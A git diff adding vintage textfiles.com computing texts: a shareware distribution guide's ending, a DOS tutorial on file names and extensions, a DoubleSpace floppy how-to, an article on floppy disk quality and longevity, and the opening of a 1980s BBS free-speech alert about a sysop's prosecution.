of your products on BBS systems all over the +world, but all with different filenames. + +Please note that the ASP Hub Network, and nearly every other electronic +distribution service *REQUIRE* that your files be submitted as an archived +file, using the ZIP format. Also note that many BBS sysops will not go to +the trouble of ZIPing your unarchived files for you. If you don't supply +them with an archived distribution version of your product, it might not +get distributed by BBSs. + +If you supply your own disk labels, it is recommended that the ASP logo, or +at least the initials "ASP" be included on the label, so that anyone can +immediately identify your disk as an ASP member's software. + + +SUMMARY +------- +Your distribution disk should now be ready to submit to the various BBSs, +distribution services, and Disk Vendors. + +You may choose to create a separate distribution disk for use by BBSs and +Disk Vendors. However, if you follow the above steps in preparing your +distribution archive file, a separate "Disk Vendor" disk is probably not +necessary. The majority of disk vendors will be able to accept your +distribution file/disk if it is prepared in the above described format. + + \ No newline at end of file diff --git a/textfiles.com/computers/filename.txt b/textfiles.com/computers/filename.txt new file mode 100644 index 00000000..8503b3af --- /dev/null +++ b/textfiles.com/computers/filename.txt @@ -0,0 +1,435 @@ + + ---------------------------------------------------------------- + + FILE NAMES AND EXTENSIONS - THE KEYS TO THE KINGDOM + + ---------------------------------------------------------------- + + To the beginner, DOS is a little cryptic in its use of file + names. Study the example directory listing below and the + notes to the right of the listing: + + PCPC EXE 51489 5-03-86 3:36p ---> PCPC.EXE + PCPR EXE 21457 5-03-86 3:29p ---> PCPR.EXE + PCPY EXE 32017 5-03-86 3:39p ---> PCPY.EXE + README 128 5-03-86 12:46p ---> README + NOTES565 TXT 1390 7-03-86 8:31a ---> NOTES565.TXT + + In each case you will note the REAL file name to the right and + the directory listing version to the left. The point is that + in DOS, filenames always have a name, a period or dot and an + optional (but highly useful) extension. This is a very important + point! + + KEYS TO THE SHAREWARE KINGDOM! + + Study the following list carefully, perhaps print it on paper + and mark it with a colored highlighter. This list contains a + roster of filename extensions which reveals the type of file and + its possible contents and application. + + FILE EXTENSIONS WHICH PROBABLY CONTAIN DOCUMENTATION, + INSTRUCTIONS OR PRINTED TEXT + + .DOC ---------> Probable DOCumentation file + .TXT ---------> Probable Text (TXT) file + .MAN ---------> Probable MANual/instruction file + .LST ---------> Probable file containing a LIST. + .PRN ---------> Probable text file from a PRINTED source. + .INS ---------> Probable INSTRUCTIONS in text form. + .HLP ---------> Probable HELP text file. + . ---------> NO, EXTENSION. VERY LIKELY A TEXT FILE! + .HST ---------> Probable text file containing HISTORY of + program revisions + + FILENAMES (WITH OR WITHOUT EXTENSIONS) WHICH PROBABLY + CONTAIN INSTRUCTIONS OR PRINTED TEXT + + README ---------> VERY IMPORTANT TEXT FILE + READ.ME ---------> VERY IMPORTANT TEXT FILE + READ.1ST ---------> VERY IMPORTANT TEXT FILE + READ ---------> VERY IMPORTANT TEXT FILE + READ.NOW ---------> VERY IMPORTANT TEXT FILE + + NOTE! There are so many variations of the "READ..." theme that + hopefully you can imagine other variations of this "READ..." + concept! + + If you stop and think about it for a minute, most of these + extensions and filenames offer strong clues about file contents + and phonetically "hint" to you what the file contains. Here are + some examples you might actually see. Note the "clues" that tell + you text or instructions are available inside the file: + + 1232XX.TXT MAKE445.DOC SYSOPS. + ASEASY.LST MANUAL.TXT READ. + DATABASE.DOC MANUAL. AUTHOR. + ENTIRE.MAN FORMFEED.MAN VENDOR. + MONEY.TXT HOMEHELP.HLP README. + README.!!! HOMEHELP.LST README.NOW + READSOON. HOMEHELP.HST VENDORS. + BBM.PRN TRY44B.DOC MANUAL.PRN + + Once you have determined that a file contains text or + instructions, you need to read the information on your screen. + There are three ways to do this 1) the hard old DOS way. 2) the + better DOS way 3) use a file viewer - easiest. + + 1) THE HARD, BUT ACCEPTABLE WAY: Use DOS TYPE command: + + Example, A>type readme.doc (will type the document file + README.DOC to the screen) + + Example, A>type B:readme.doc (will type the document file + README.DOC which is on the B: floppy drive) + + Example, A>type readme.doc>prn (will type the document on your + printer). Important! + + Use the Ctrl and S keys together to pause rapid screen + scrolling. Any key touched resumes and Ctrl-S again pauses. Use + Ctrl and C keys (Ctrl-C) to abort the whole process! Think of + this reminder: Ctrl-S means "stop." Ctrl-C means "crash the + process." + + 2) A SLIGHTLY BETTER WAY: DOS MORE AND PIPING + + Here is another shortcut if the screen of information scrolls by + too fast to read. Use the DOS MORE filter. This MAY or MAY NOT + work on some computers. Switch to your hard drive where the file + MORE.COM usually resides in the DOS subdirectory. Now to read + the documentation file, for example README.DOC, on the A: drive, + do this: + + C>TYPE A:README.DOC|MORE + + Note that you are in the C: drive. You are viewing the file + README.DOC on the A: drive. The vertical bar | is usually on the + backslash key \ and is a shifted charter (uppercase). Note that + there are no blank spaces between the file name README.DOC, the + vertical bar | and the MORE command. This may or may not work on + all computers. MORE.COM must be pathed through the DOS directory + to work. More is a DOS filter. The vertical bar | is called a + pipe. Thus we are "piping" the output of the type command though + the more filter. Sounds odd, but this is one of the obscure + tricks of DOS! + + 3) THE BEST WAY: An external file viewer or browser. The easiest + and most comforable. + + Sometimes a shareware vendor or computer club can provide a file + viewer. These go by many names. Popular viewers are LIST.COM, + BROWSE.COM, VIEW.EXE, PAGE.EXE and others. These let you view + inside a text file and page up and down with minimum muss and + fuss! For our example, let's pretend you are using the popular + LIST.COM program. + + Example, A>list readme.doc (will type the document file + README.DOC to the screen) + + Example, A>list A:readme.doc (will type the document file + README.DOC which is on the A: floppy drive to the screen) + + Example, A>list C:\doc\readme.doc (will type the document + file README.DOC which is on the C: hard drive in the \DOC + subdirectory to the screen) + + Here's another tip. Sometimes a shareware program may not use a + file like PROGRAM.DOC or README.TXT for instructions but instead + a program file like README.COM or MANUAL.EXE or VPDOCS.COM. The + idea here is that instead of using a TEXT FILE the programmer is + using a program to run and display the documentation! So for + this variation, you simple run the program to see the + documentation. + + Example: for VPDOC.COM at the DOS prompt simply type the name + of the file: C>VPDOC (then press return/enter key) + + Example: For README.COM C>README (then press return/enter + key) + + Let's move on and talk about other filenames and extensions + which do other jobs on a computer. + + OTHER IMPORTANT FILENAME EXTENSIONS + + .EXE ---------> An EXECUTABLE FILE which starts program + .COM ---------> A COMMAND FILE which starts program + .BAT ---------> BATCH FILE which starts program + .BAS ---------> BASIC file which can be run with + the aid of the GWBASIC interpreter + GWBASIC which is normally on your DOS + disk or hard drive. + + FILE EXTENSIONS WHICH INDICATE THE FILE + IS "COMPRESSED OR ARCHIVED" AND MUST BE UNPACKED PRIOR TO USE + + .ZIP ---------> Compressed file, use PKUNZIP to unpack + .ARC ---------> Compressed file, use ARC + .PAK ---------> Compressed file, use PAK + .LZH ---------> Compressed file, use LHARC + .ZOO ---------> Compressed file, use ZOO + + OTHER USEFUL EXTENSIONS + + .BAK ---------> A backup or duplicate file + .DAT ---------> A data file + .CFG ---------> Configuration data for program + .WKS ---------> Spreadsheet file + .WK1 ---------> Spreadsheet file + .DBF ---------> Database file in dBase format + .ASC ---------> ASCII file, perhaps a basic program + saved in ASCII format + .BIN ---------> Binary file, file used by a program + + Some shareware disk vendors try to help you by putting their own + files on a disk with a little extra information. The following + file examples might offer help in text or documentation form. An + advanced shareware user would guess quickly that these files + refer to a disk from a shareware vendor or computer club library + and are most probably disk number 565 in a larger set of + programs that vendor or club offers in a library collection. + + NOTES565 TXT 1390 7-03-86 8:31a + FILES565 TXT 1728 7-03-86 8:37a + + If you buy a disk from a disk vendor named BEST VALUE SHAREWARE + DISTRIBUTORS you might look for files such as the following + which also contain text, BAT, COM or other file startup + information. + + Each vendor might use a different system, but watch for these + patterns as you list directory information on a shareware disk. + With the variety of methods, your best bet is to study filename + extensions for a few minutes and "play detective" which for some + folks is a bit of the interest in using shareware! + + FILES PUT ON A DISK BY A HYPOTHETICAL SHAREWARE + DISK VENDOR NAMED BEST VALUE SHAREWARE INC. + + BESTVAL.COM 1390 7-03-86 8:31a + BESTVAL.TXT 1728 7-03-86 8:37a + BV.DOC 5656 7-03-86 8:31a + RUNBEST.COM 1777 7-03-86 8:37a + BESTVAL.767 8787 8-9-91 9:30P + + ---------------------------------------------------------------- + + COM, EXE AND BAT FILES START PROGRAMS + + ---------------------------------------------------------------- + + A file ending in EXE or COM is a file which contains a + EXECUTABLE OR "RUNNABLE" program and is a way to start a + software package. + + Examples: + + To start PCF.EXE do this PCF (then press enter). + For DBFKK.EXE DBFKK (then press enter.) + + Some files which end in BAS will need a basic interpreter such + as GWBASIC.EXE to operate. Example files would be GAME.BAS or + MUSIC.BAS. GWBASIC.EXE is usually included on your DOS disk + which came with the computer. + + Another standard of shareware programs is to use batch files to + start programs. GO.BAT or MENU.BAT or START.BAT or INSTALL.BAT + are "batch files." Simply type the first word at the prompt to + proceed. + + Example: for file GO.BAT GO (then press enter). + + DOS searches a disk for programs to run in a precise order: + + HELLO.COM ---------> Run this first if found then try + HELLO.EXE ---------> to find and run this then + HELLO.BAT ---------> try to find and run this. + + ---------------------------------------------------------------- + + BASIC DATA FILES + + ---------------------------------------------------------------- + + If you find a BASIC program file which ends in .BAS try this + per the following example . . . + + For the file HELLO.BAS, first copy both GWBASIC.EXE + and HELLO.BAS to a blank formatted diskette. Then issue the + command: + + A>GWBASIC HELLO + + Another alternative is to leave GWBASIC.EXE on your hard drive + and tell it where the basic program is located. + + Example: C>GWBASIC A:HELLO + + The above example assumes a copy of GWBASIC.EXE resides on your + hard drive and a floppy containing the basic program HELLO.BAS + is on the A: drive. + + The program will be loaded into GWBASIC and run. If you + don't care for the program, try to exit if the program gives + you a menu of choices, otherwise press CTRL-BREAK keys + at same time which will let GWBASIC exit. You will see an + "OK" prompt. Type the word "system" and press the return/enter + key to return you to DOS and leave GWBASIC. + + Basic is a rather elegant and precise programming system if you + are interested! Pick up a book at your local library and you can + learn how to use GWBASIC.EXE on your DOS disk to write and modify + your own elaborate custom programs! Also investigate the + availability of affordable Basic compiler programs which prepare + speedy .EXE free standing programs rather than requiring you to + haul out your GWBASIC.EXE file each time you wish to run the + program. + + ---------------------------------------------------------------- + + SOME EXAMPLES - OUR FIRST POP QUIZ! + + ---------------------------------------------------------------- + + Try to puzzle through this pop quiz! Small stars next to the + filenames indicate an educated guess as to IMPORTANT TEXT + information or documentation contained within. These directory + lists are similar to what you might see on your screen when using + the DIR command when you first explore a new software disk. Brief + notes may follow each directory listing. + + ** means high probability documentation is contained within + * means some documentation possibly is contained within + + + BRUN10 EXE 58388 7-17-85 1:56p + BUSINESS DAT 384 5-04-86 6:42a + DELXTRA BAT 128 5-03-86 6:55p + MSG1 TXT 384 5-03-86 7:10p * + MSG2 TXT 768 5-03-86 7:23a * + PAY BAT 16 9-02-85 12:11p + PCPAY DOC 64512 5-04-86 7:11a ** + PCPC EXE 51489 5-03-86 3:36p + PCPR EXE 21457 5-03-86 3:29p + PCPY EXE 32017 5-03-86 3:39p + PRNTDOC BAT 128 5-03-86 7:09p + README BAT 128 5-03-86 12:46p + GO BAT 668 7-03-86 8:39a + NOTES565 TXT 1390 7-03-86 8:31a * + FILES565 TXT 1728 7-03-86 8:37a * + + + Note that on the above disk the LARGEST file PCPAY.DOC contains + 64,512 bytes. Its size leads to strong suspicion it contains + the main documentation. Shorter files probably contain other + useful data. The two files at the bottom of the directory listing + make one suspect this disk in number 565 in a club library or + disk vendor collection. Sherlock Holmes would approve of our + logic! + + + ASEASY EXE 205392 7-17-90 10:29a + ASEASY MSG 9636 7-16-90 6:27p * + ASEASY CFG 298 1-18-90 7:47p + ASEASY HLP 58346 4-25-90 9:05a ** + HTREE EXE 9185 4-11-90 12:36a + ASAU400 COM 36610 4-11-90 2:26p + VENDOR DOC 3784 4-10-90 11:54p * + LICENSE DOC 4133 4-11-90 12:28a * + ORDER ME 4301 10-15-89 11:24p * + YESNO COM 97 10-02-86 9:47p + SETUP BAT 2873 7-18-90 12:26p + READ ME 19512 4-12-90 11:53a ** + + + The largest file which hints it contains text data would be a + good candidate to examine! The file SETUP.BAT suggests that + some intial setup or configuration of the program is necessary + prior to use. + + + COMFILES 12-05-89 4:48p + GOODBY 384 10-03-89 2:44p * + INTRO1 512 1-11-90 8:19a ** + INTRO2 896 10-08-89 7:02p ** + MENU 640 10-03-89 3:41p + NEWPROD 2176 10-03-89 3:40p * + MANUAL DOC 77568 2-02-91 11:12a ** + QUICK DOC 33664 2-02-91 11:10a ** + TUTR DOC 109696 10-02-89 4:30p ** + SEBFI COM 2270 12-10-89 2:50p + SEBFI DOC 5888 12-05-89 8:04p * + SEBFI BAT 384 12-02-89 1:25p + LASTMIN ANN 512 12-08-89 1:45p * + GO BAT 1362 1-31-91 6:17p + SEBFIM BAT 384 12-08-89 3:05p + + + This is a disk with several important documentation files, but + a highly unusual second subdirectory! COMFILES contains + other file(s) and must ALSO be examined. The DOS CD or + change directory command must be used to examine this other + subdirectory or file storage area of the disk. See your DOS manual. + Most shareware authors try to stay away from using additional + subdirectories on a disk which can confuse a beginner. The file + LASTMIN.ANN would tell an advanced shareware user that the file + contains "last minute announcements" and is most probably + a text file. TUTR.DOC probably means "tutorial document." + QUICK.DOC is probably quick startup documentation. + + + HM EXE 306347 8-28-90 11:48a + + + This is an odd disk indeed. No documentation? Actually this + is a special SELF-EXTRACTING file which is usually copied + to a hard drive run with the command HM. The file will proceed + to unpack itself and produce several files containing + documentation, COM or EXE files and more! Most authors would + include a small README file on the disk to advise you of this + fact, but this author has omitted even that! If you locate a + large EXE file, copy it to your hard drive (perhaps into + a subdirectory named TEMP or temporary) and then run the + file to cause it to unpack and produce all the little subfiles + which are the main program! Shareware authors do this to + conserve disk space or otherwise compress large programs to + fit onto fewer disks. + + + DBATE001 EXE 185785 3-25-90 9:07a + DBATE002 EXE 284884 6-22-90 11:28p + DBATE003 EXE 244771 9-19-90 7:47p + READ1ST EXE 6267 11-26-90 11:04p ** + + + READ1ST.EXE is run since it is a self-extracting EXE file which + probably produces documentation notes. The other three files are + probably self-extracting files which produce three separate + programs. This is a case of multiple self-extracting files! A + clever author is highly compressing his data to save space on + disk! + + + FUNNELS EXE 59904 9-21-84 3:01p + FUNNELS DOC 14713 9-21-84 1:58p ** + FUNNELS INV 2432 9-21-84 3:18p + ATC2 BLD 4096 8-23-84 9:08p + ATC EXE 50304 7-09-84 11:20a + AUTOEXEC BAT 11 7-12-84 10:29a + ATC DAT 384 1-01-80 1:04a + EUCHRE BAS 22784 7-21-84 3:09p + EUCHRE DOC 3645 7-21-84 3:52p ** + CRC TXT 1123 11-16-84 7:06a * + FUNNELS SCR 128 11-25-88 10:27a + + + A relatively simple disk. Text or documentation files indicated. + Do you see the single basic BAS file which will require a copy + of GWBASIC.EXE? + + Pop quiz part 2: Grab a few loose disks from any random source + and repeat this detective process a few times and you will soon + be a shareware GURU! + + diff --git a/textfiles.com/computers/flop.txt b/textfiles.com/computers/flop.txt new file mode 100644 index 00000000..3609b4bb --- /dev/null +++ b/textfiles.com/computers/flop.txt @@ -0,0 +1,83 @@ + + USING DOUBLESPACE ON FLOPPY DISKS + + There are a few things you should know before you use + DoubleSpace on floppy disks. + + 1. You can't use DoubleSpace unless you have installed it on + your computer. + + 2. The floppy disk needs to have at least .65 Megabytes + (665K) of free space. This means you cannot use 360K, + 5¬" diskettes. Change to the appropriate drive, and use + the CHKDSK command to check the capacity of a diskette. + + 3. If you plan to share data with someone else, they will not + be able to read a DoubleSpaced diskette unless they are + using DoubleSpace on their computer. + + 4. Before you can use a DoubleSpaced diskette, you will need + to MOUNT it. This is not as painful as it sounds. + + 5. DOS will create a new drive where it will store information + about this compressed floppy disk. It does this in the same + fashion as it did when compressing a hard drive. + + + COMPRESSING A FLOPPY DISK + + Make sure you read items 1-4 above. Then, to compress a floppy + disk, do the following: + + 1. Place a formatted floppy disk in the drive of your choice. + + 2. If you want to compress a diskette in your A drive, type + the following: + + dblspace /compress a: + + A shortcut for the DBLSPACE /COMPRESS A: command + is: + + dblspace /com a: + + Change to the newly DoubleSpaced floppy: + + a: + + Then type: + + dblspace /info + + A shortcut for the DBLSPACE /INFO command is: + + dblspace /i + + If you restart your computer or change floppy diskettes, you will + need to MOUNT the floppy disk before it can be used. + + + + + This section is finished. It is an excerpt from LEARNING DOS FOR + THE COMPLETE NOVICE, by Steven Woas, copyright 1993. When you register + this program, you will receive the 336 page book, LEARNING DOS FOR THE + COMPLETE NOVICE which covers DOS 3.2 through DOS 6. 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You have a back-up somewhere, but it gets you to thinking +about your back- ups on your commercial programs. What happens if they +go bad? Should you have made them on some type of premium diskette to +guard against that? + + You scour through catalogs and ads in magazines. There are sources +galore for diskettes, at all prices, and some of them even have +specifications. You run into one spec called "Clipping Level" and the +supplier claims that because his disks have been tested to a higher +clipping level they are superior. Should you pay a premium for disks +with superior specifications? What do these specs mean? Will your +back-ups be less likely to fail if you use premium discs? + + These are difficult questions to answer. Perhaps an explanation of +some of the tests run on disks and what can happen to your back-ups with +time would help you make that decision. In addition, you may be +interested in considering the cost tradeoffs of using higher priced +disks. + + As an engineer with many years of experience in magnetic recording +I had never heard of the term "clipping Level" until it came up in a +discussion on KAY*FOG. In fact, I had never seen a specification sheet +in any box or bag (I buy the cheap stuff by mail order too!) of disks I +have purchased. However, I did spend a couple of years as a part of a +design team on a Winchester Drive for personal computers and one of my +tasks was the specification and testing of the disks used in those +drives. + + CLIPPING LEVEL: Since magnetic media is pretty much the same +whether it is tape, diskettes, or hard disks (the major difference being +that the material to which the magnetic particles are bonded is mylar +for tape and diskettes, and aluminum for the hard disks), it wasn't +difficult for me to guess at what was meant by "clipping level." A +little looking through a parts catalog and I found a specification on a +chip designed for use in disk drives and they defined "clipping level" +(although in rather vague terms). It is unfortunate that these words +are used to describe a test performed on diskettes since they have a +different and more widely understood meaning throughout the general +electronics industry. In any case we will have to accept these words +since they are the ones used in the advertisements. + + In simple terms, your drive uses a "head" to read the information +on the disk. You can think of this as being like the needle and pick-up +on your phonograph. The head reads the magnetic information previously +written on your disk and converts it into an electrical signal. This +signal is further processed and eventually takes on a form suitable for +transmission to your computer as bits, or bytes, which represent the +data. + + SIGNAL VARIATION: The size and shape of the electrical signal +developed by the head varies for many reasons. First of all, it varies +as a result of the information written on the disk, and this variation +itself represents that information. However, there are other variations +which take place due to imperfections in the head, the mechanical +characteristics of the drive, or imperfections in the diskette. These +variations, if large enough, will lead to the electronics in the drive +not being able to correctly decode the information, and your computer +will indicate by means of some error message that it cannot read the +disk. It is therefore important to keep these variations (those not +part of the data) at a minimum. + + COATING THICKNESS: Magnetic diskettes or tapes are manufactured by +bonding magnetic particles to a flexible mylar backing material. +Characteristics which affect the performance of the final product +include, but are not limited to, the magnetic characteristics of the +particles, the size of the particles [Note: it is modification of these +two characteristics that make the difference between a 1.2M disk and a +360K disk.], the thickness of the coating, and, most important to the +subject of "clipping level," the uniformity of the coating. If a tiny +part of the disk, the size of a pinhole, does not get coated, the signal +level recoverable from that spot is reduced. Thus, if there are a +number of these of sufficient size, the level of the signal will be +fairly uniform until that "pin-hole" passes under the head, at which +point it will drop. These are referred to as "drop-outs" in the +industry. + + Furthermore, if the coating thickness varies over the surface of +the disk, the amplitude of the signal can vary in a relatively smooth +manner as the disk rotates. This is generally not a serious problem, +however. + + Your drive can recover your data by separating these disk related +variations from the variations in signal due to the real data, provided +that disk related variations are not too large. Typically a drive might +be able to successfully ignore disk related variations which did not +reduce the amplitude of the real signal to less than 30% of the normal +output. This number, however, also depends on a wide variety of +factors, and varies from drive to drive, even the same model from the +same manufacturer. + + Thus, anything one could do to assure that the level of these disk- +related variations are held within a specified range should reduce the +probability of errors. The key word is "probability," and more will be +said about this later. Therefore a disk which is tested to a "clipping +level" of 60% is tested to assure that the variations due to the disk +are small enough that the signal level never drops below 60%. That is, +the variations are held to a range between 60% and 100%. It follows +that the higher the "clipping level," the less variation in signal +output and the reduced probability of a disk error. + + Now comes the tough part. How much extra money should you pay for +a disk tested to a 60% level as compared to one tested to a 40% level? +Would you pay 50% more? Twice as much? Ten times as much? The way I +look at it is this: There is a high probability that if I buy 25 or 50 +brand X disks and they all work,whatever tests were run on them were +probably sufficient to assure me that brand X disks will always work. I +have no way of knowing what "clipping level" disks destined for my +drives should be tested at, nor, do I believe, do the manufacturers of +floppy disks. + + A WORD ABOUT HARD DISKS: In the case of Winchester drives, the +situation is a little different. The manufacturers of the disks which +go in these drives are generally different companies than those that +manufacturer to drives. The drive manufacturer imposes specifications +on the disk manufacturer. Furthermore, the drive manufacturer +continually tests disks using sophisticated equipment to be sure that +the disk manufacturer meets these specifications. That is, people who +manufacture disks for use in hard drives do not sell them directly to +the end user (removable hard disks being the exception). + + BOTTOM LINE $$$: But, back to floppies. Assume I buy 100 diskettes +from each of two sources, SuperDisk and CheapDisk. Assume I pay 40 +cents each for the CheapDisks and $2.00 each for the SuperDisks. +Finally, out of all the disks I bought, one SuperDisk won't format and +10 CheapDisks won't format. I have ended up paying slightly over +$2.00/disk for the good SuperDisks and about 45 cents each for the good +CheapDisks. I still think I got a better buy on the CheapDisks. + + MORE USE -- BETTER PERFORMANCE: Now, what about disk failures in +the future? That is as I use these 90 CheapDisks are they more likely +to fail in the future that the 99 SuperDisks? Well, I suppose there are +those who would argue with me that in fact they would. But I really +don't believe it. The reason is that the first few times I use any +diskette its performance will improve. The surface of the disk is left +slightly rough (not on purpose) during the manufacturing process and +this process prevents good contact between the head and the disk. This +poor contact degrades performance of the disk. As the disk is used and +rotated past the head, the head knocks off some particles of the +coating, smoothing the surface and improving the contact and the +performance. In tape recording, in critical applications, new tape is +never used without running it through a machine at least once and +sometimes several times, just for this reason. Therefore, after I have +used my CheapDisks several times I feel more comfortable with them than +when they were brand new. + + HOW LONG WILL THEY LAST? Finally, what about the really long term? +Will CheapDisks retain the information stored on them equally as well as +SuperDisks, say over a period of 100 years? Well, here we are dealing +with real unknowns. There are no disks around that are a hundred years +old. Magnetic recording using media of the type used in disks is only +about 40 years old. Archival data that has been around for long periods +of time has turned out to be a problem in a number of fields. Ask a +librarian about the problems facing the Library of Congress in +protecting many of its books. + + There has been some experience with magnetic recording in general +that may be of interest. In tape, such as your audio or video +cassettes, or computer tape as used on large main frames, there is a +problem with long term storage known as "print through." The magnetic +pattern on the tape representing the information emanates a magnetic +field, just as the North and South Poles do. This field is very minute, +but still present, and any material susceptible to being magnetized will +do so in the presence of a magnetic field. This is true even for weak +fields if the material is held still within the field for long periods +of time. All tape is susceptible to being magnetized, that is it's prime +purpose in life. + + When wound on a reel, each piece of tape is tightly pressed against +another one, and each piece emanates a field. If the tape is left +untouched in this form for several years, a little of the information +recorded on each piece is transferred to mix with the information on the +adjacent piece. In audio tapes one can hear this as a low level +background of the same music that played either a few seconds earlier or +a few seconds later, particularly where a loud passage is immediately +followed by a quiet one. + + Normally disks have a jacket around them that is fairly thick. +Thus it is unlikely that print through would take place between disks. +On double sided disks however, the magnetic information on one side is +pretty close to that on the other side, the distance being in the same +range as that previously discussed in the case of tape on a reel. If I +were to make a guess at the first cause of long term failure, in the +sense of not being able to recover 100% of the material form a floppy, I +would guess that "print through" would be the cause. + + RE-COPY YOUR FLOPPIES: Someone once raised the question of whether +it makes sense to re-copy masters or back-ups from time to time to make +new backups. My initial reaction was that I didn't think it was +worthwhile. Having given it some thought, however, it might not be a +bad idea. If there is a degradation that takes place with time on an +untouched back-up as it sits on the shelf, re-copying does in fact +restore the information to a more pristine state and thus acts as added +protection against the probability of losing your data. As to +SuperDisks being any better than CheapDisks in an archival sense, I can +think of no reason why there should be any difference, but perhaps we +won't know the answer to that for another 100 years. + + HOW COME SO CHEAP? There are a lot of reasons SuperDisks sell for +more than CheapDisks. They spend more on advertising, and packaging, +and possibly corporate headquarters. They sell primarily to companies, +which avoid buying anything by mail order from some post office box +across the country. And they sell at the price they do because people +are willing to pay for it, whatever the reason. In fact, however, if +you look into it you will find that many of the people selling the +cheaper diskettes are buying their raw material from the same source as +those selling the expensive versions. + + The whole thing about mass produced products, whether it is disks, +drives, computers, or light bulbs, is that they are produced on a +statistical basis. That is, costs are reduced to the point where the +probability of a bad one getting to the user is acceptably low. This is +simply good business. No company can stay in business if it strives for +perfection in a commercial product line. Only governments can afford +products which have been tested to the level of a space shuttle, and as +we found out even they are not perfect. + + Personally I have always bought the least expensive disks I could +find. Furthermore, I buy single sided, single density diskettes and use +them in double sided, double density drives, with no problem. On one +occasion, I paid over $25.00 for a box of 10 diskettes. It was a +Sunday, I needed them, and they were the only ones I could find. One of +the disks in that box proved to be the first bad disk I ever ran into! + + One last comment on probabilities. If the probability of a given +disk failing is one in 1,000 under whatever circumstances, the +probability of two failing under the same circumstances is one in 1,000 +times 1,000, or one in 1,000,000. Anyone for making two 45 cent back- +ups instead of one $2.00 back-up? + + Note: I have taken some liberties in the preceding article in the +interests of keeping it from becoming overly technical but do not +believe these affect the substance of the arguments for purchasing lower +cost disks. Also, I was not able to find detailed information on the +testing of diskettes in the literature and much of the above is based on +extending my experience from tape and hard disks to diskettes. + + + I would appreciate it if anyone having more information on the +subject, or finding inaccuracies within the article contact me either +through KAY*FOG PCBBS (415)285-2687 or by mail: P.O. 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DO YOU WANT TO BE HELD LEGALLY RESPONSIBLE FOR WHAT ANYONE WHO DIALS +UP YOUR PERSONAL COMPUTER SAYS IN A MESSAGE LEFT UPON IT? DO YOU WANT TO BE +SPIED UPON BY COMPUTER-OWNING FRIENDS MADE PARANOIC BY DIAL-UP POLICE? + + A TERRIBLY IMPORTANT ISSUE IS ABOUT TO BE PRESENTED BY THE DISTRICT ATTORNEY +TO A CALIFORNIA COURT. THE CONSEQUENCES COULD BE FELT FOR GENERATIONS TO COME. +IT INVOLVES NO LESS THAN WHETHER FREEDOM OF SPEECH WILL SURVIVE INTO THE AGE OF +INFORMATION. + + THE IMMEDIATE CASE INVOLVES THE GRIM, AND FRIGHTENING, DETERMINATION OF A +LARGE CORPORATION, PACIFIC TELEPHONE & TELEGRAPH COMPANY, TO PROSECUTE A LOS +ANGELES CITIZEN, TOM TCIMPIDIS, FOR THE APPEARANCE IN HIS PERSONAL +NON-COMERCIAL COMPUTER "BULLETIN-BOARD" OF A MESSAGE PLACED THERE BY AN +UNIDENTIFIED CALLER WHICH CONTAINED THE NUMBER OF A TELEPHONE COMPANY CREDIT +CARD. IT DOESN'T SEEM TO MATTER THAT THE EXISTANCE OF THE MESSAGE IN HIS +COMPUTER - AMONG HUNDREDS OF MESSAGES LEFT THERE BY OTHER CALLERS - WAS UNKNOWN +TO MR. TCIMPIDIS UNTIL BROUGHT TO HIS ATTENTION BY PACTEL GUMSHOES HUNTING FOR +CREDIT CARD THIEVES. AND IT HASN'T SEEMED TO BOTHER ANYBODY THAT IF MR. +TCIMPIDIS COULD HAVE INTERCEPTED THE MESSAGE BY DILIGENT REVIEW, SO COULD HAVE +THE TELEPHONE COMPANY OVER WHOSE LINES IT FIRST TRAVELLED. AND NEVER MIND THAT +MR. TCIMPIDIS IS A LAW ABIDING, RESPONSIBLE, 34 YEAR OLD ENGINEER WITH NO +HISTORY OF, OR SYMPATHY FOR, ILLEGAL USE OF COMPUTERS. HE ONLY OWNS A FRIENDLY +COMPUTER WHICH CAN BE DIALED UP BY THOSE WHO WANT TO SOCIALIZE ELECTRONICALLY. + + NO, THE TELEPHONE COMPANY - IN ITS HEAVY-HANDED FRUSTRATION AT NOT BEING ABLE +TO CATCH, DIRECTLY, ENOUGH CREDIT CARD THIEVES WHO ABUSE COMPUTER +COMMUNICATIONS, WANTS TO IMPRESS INNOCENT MR. TCIMPIDIS INTO U#MING FOR THEM +AS A COMPUTER SPY AND TO SEARCH FOR, DELETE OR REPORT ILLEGAL MESSAGES ON HIS +SYSTEM THAT AFFECTS THEIR BUSINESS, AND THROUGH THE EXAMPLE THEY MAKE OF HIM TO +BLACKMAIL ALL OTHER COMPUTER OWNERS INTO BECOMING EITHER COMPUTER VIGILANTES OR +ELECTRONIC STOOL PIGEONS. IT IS A BLATANT ASSAULT ON THE SENSE OF +RESPONSIBILITY OF ORDINARY CITIZENS AND A CHILLING DISREGARD FOR THE NECESSITY +OF FREEDOM OF SPEECH IN THE ERA WHERE PERSONAL COMPUTERS WILL BE USED AS +NATURALLY BY INDIVIDUALS FOR COMMUNICATIONS AND FREE ASSEMBLY AS TELEPHONES AND +MEETING PLACES ARE USED NOW. + + THERE IS A SIGNIFICANT DIFFERENCE BETWEEN INFORMATION ENTERED INTO A PRIVATE +COMPUTER NETWORK AND THAT PRINTED IN BROADCAST MEDIA, SUCH AS A NEWSPAPER, FOR +EXAMPLE. EDITORS CAN BE HELD LIABLE FOR WHAT IS PUBLISHED SINCE THEY MUST +CONSCIOUSLY APPROVE EVERY WORD PRINTED. ON PERSONAL COMPUTER NETWORKS MOST OF +THE WORDS ARE PLACED THERE BY CASUAL CALLERS, JUST AS MESSAGES ARE LEFT ON +TELEPHONE TAPE ANSWERING MACHINES. TO HOLD THE OWNER OF SUCH A SYSTEM +RESPONSIBLE FOR THE UTTERANCES OF ALL KNOWN AND UNKNOWN CALLERS IS LIKE +PROSECUTING A HOME OWNER FOR WHAT GUESTS IN THE LIVING ROOM MAY SAY THAT IS +ILLEGAL WHILE THE HOST IS IN THE KITCHEN. + + THESE LARGER ISSUES OF ELECTRONIC FREEDOM SHOULD CONCERN EVERY AMERICAN. + + WE MILLIONS OF AMERICANS WHO ARE RESPONSIBLE OWNERS OF SMALL COMPUTERS - +WHICH TODAY INCLUDES DOCTORS, LAWYERS, BANKERS, CONGRESSMEN, EDUCATORS, CLERGY, +JOURNALISTS, THE YOUNG AND OLD, AND WHICH ALSO COUNTS HUNDREDS OF THOUSANDS OF +THE SAME PEOPLE WHO HAVE CHOSEN TO HOOK THEIR COMPUTER TO THEIR TELEPHONE TO +CREATE BETTER WAYS TO COMMUNICATE WITH OTHERS, WANT TO ALERT THE +NON-TELECOMPUTING PUBLIC TO THE FRIGHTENING POSSIBILITIES OF THE ABRIDGMENT OF +FREEDOM OF SPEECH BY THOSE WHO WOULD - AND 